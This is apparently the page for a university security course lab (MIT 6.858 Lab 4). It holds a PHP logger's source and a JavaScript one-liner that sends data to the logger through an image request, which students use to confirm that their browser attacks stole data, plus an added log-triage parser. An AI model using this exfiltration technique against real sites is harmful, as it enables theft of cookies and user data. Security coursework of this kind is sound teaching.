You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2020/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
<?php
do {
    // No "id" parameter: fall through and render the HTML page below.
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    // Bound the size of both client-supplied fields.
    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    // Fail closed: without APCu there is no rate limiting, so refuse to log.
    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    // apcu_add() only succeeds if the key is absent; the entry expires after 5 seconds.
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    // Replace CR/LF so that one request cannot write more than one log line.
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.858-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    // Hold an exclusive lock for the whole read-truncate-rewrite sequence.
    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    // Read at most 100 existing lines, then rewrite the file newest-first.
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }

    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.858/2020/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
  <link rel="stylesheet" type="text/css" href="labs.css" />
  <title>Lab 4 Logging Script</title>
</head>
<body>
  <h1>Lab 4 Logging Script</h1>
  <p>
    You can use this server side script to extract data from
    client-side JavaScript. For example, clicking this client-side
    hyperlink will cause the server to log the payload:
  </p>
  <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
  <p>
    The random argument is ignored, but ensures that the browser
    bypasses its cache when downloading the image. We suggest that you
    use the random argument in your scripts as well. The ID argument
    will help you distinguish your log entries from those sent by other
    students; we suggest picking your MIT Athena username. Newlines are
    not allowed in <tt>javascript:</tt> links; if this bothers you, try
    <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
  </p>

  <h2>Test form</h2>
  <p>
    If you just want to try out the script, you can use this form.
    (For your actual attacks in lab 4, you'll probably want to use the
    JavaScript image technique shown above.)
  </p>
  <form method="GET" action="">
    <label for="id">ID:</label><br />
    <input name="id" placeholder="your-mit-username" size="40" />
    <i>(some identifier to locate your payload in the log)</i>
    <br />
    <br />
    <label for="payload">Payload:</label><br />
    <input name="payload" placeholder="some-string" size="40" />
    <i>(the information you stole)</i>
    <br />
    <input type="submit" value="Log" name="log_submit" />
  </form>

  <h2>Logged entries</h2>
  <p>
    Below are the most recent logged entries, so that you can check if
    your attack worked:
  </p>
  <pre class="tty"><?php
    // Client-supplied log content is HTML-escaped before it is displayed.
    $lines = file_get_contents("/tmp/6.858-logger.txt");
    echo htmlspecialchars($lines);
  ?></pre>

  <h2>Source code</h2>
  <p>In case you are curious, here is the source code of this page.</p>
  <pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>
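The source above writes each entry as `<RFC 2822 date>: <id>: <payload>`, which can be parsed for triage, for example to find which identifiers logged token-shaped values so that the affected sessions can be invalidated. This is an added example, not part of the course's code; `parseLogLine`, `triage`, the sample lines and the 32-hex-digit heuristic are assumptions made for illustration.

```javascript
// Triage parser for the logger's line format: "<RFC 2822 date>: <id>: <payload>".
// Added example; SAMPLE lines and the token heuristic are constructed assumptions.
const LINE_RE =
  /^([A-Z][a-z]{2}, \d{2} [A-Z][a-z]{2} \d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}): (.*)$/;
// Heuristic: name=value whose value contains a 32-hex-digit run (token-shaped).
const COOKIE_RE = /([A-Za-z0-9_.-]+)=[^;\s]*[0-9a-f]{32}/;

function parseLogLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;                 // not a line this logger wrote
  const rest = m[2];
  const cut = rest.indexOf(': ');      // first separator after the timestamp
  if (cut < 0) return null;
  const payload = rest.slice(cut + 2);
  return {
    time: m[1],
    id: rest.slice(0, cut),
    payload,
    // id and payload are both client-supplied and written unescaped, so a
    // second ": " means the field boundary cannot be recovered with certainty.
    ambiguous: payload.includes(': '),
    cookieName: (COOKIE_RE.exec(payload) || [])[1] || null,
  };
}

// Summarise per id: entry count, token-shaped cookie names seen, ambiguous lines.
function triage(text) {
  const byId = new Map();
  for (const line of text.split('\n')) {
    const e = parseLogLine(line);
    if (!e) continue;
    const s = byId.get(e.id) || { entries: 0, leakedCookies: new Set(), ambiguous: 0 };
    s.entries += 1;
    if (e.cookieName) s.leakedCookies.add(e.cookieName);
    if (e.ambiguous) s.ambiguous += 1;
    byId.set(e.id, s);
  }
  return byId;
}

// Constructed sample input (not taken from any real log).
const SAMPLE = [
  'Mon, 01 Jan 2024 10:00:03 +0000: alice: SessionCookie=demo#0123456789abcdef0123456789abcdef',
  'Mon, 01 Jan 2024 10:00:02 +0000: alice: hello-world',
  'Mon, 01 Jan 2024 10:00:01 +0000: bob: note: extra colon',
  'not a log line',
].join('\n');
```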